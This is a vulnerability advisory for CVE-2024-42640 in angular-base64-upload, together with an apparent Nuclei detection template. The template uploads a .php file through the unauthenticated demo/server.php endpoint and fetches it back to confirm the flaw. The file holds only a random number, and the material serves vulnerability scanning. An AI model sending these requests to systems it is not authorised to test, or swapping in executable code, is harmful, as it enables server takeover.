angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
PoC代码[已公开]
id: CVE-2024-42640
info:
name: Angular-Base64-Upload - Remote Code Execution
author: s4e-io
severity: critical
description: |
angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
reference:
- https://github.com/rvizx/CVE-2024-42640
- https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
- https://github.com/adonespitogo/angular-base64-upload
- https://nvd.nist.gov/vuln/detail/CVE-2024-42640
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
cvss-score: 10
cve-id: CVE-2024-42640
cwe-id: CWE-94
epss-score: 0.88772
epss-percentile: 0.99496
metadata:
max-request: 4
tags: cve,cve2024,angular,rce,vkev
variables:
filename: "{{to_lower(rand_text_alpha(12))}}"
num: "{{rand_int(1000000,9999999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
- |
POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
matchers:
- type: dsl
dsl:
- 'contains(body_1,"uploads/{{filename}}.php") || contains(body_2,"uploads/{{filename}}.php") '
- 'status_code_1 == 200 || status_code_2 == 200'
condition: and
internal: true
- raw:
- |
GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
- |
GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")'
- 'status_code_3 == 200 || status_code_4 == 200'
condition: and
# digest: 4a0a004730450220702dd27cd69dcbbedfbf0af372c93d18b433bcc6700f6eb21947fd8c35bd7e4a022100e90379366d60d639bcb67a63136098832af71b9cb65bbaafb4a2b6984abbe9e3:922c64590222798bb761d5b6d8e72950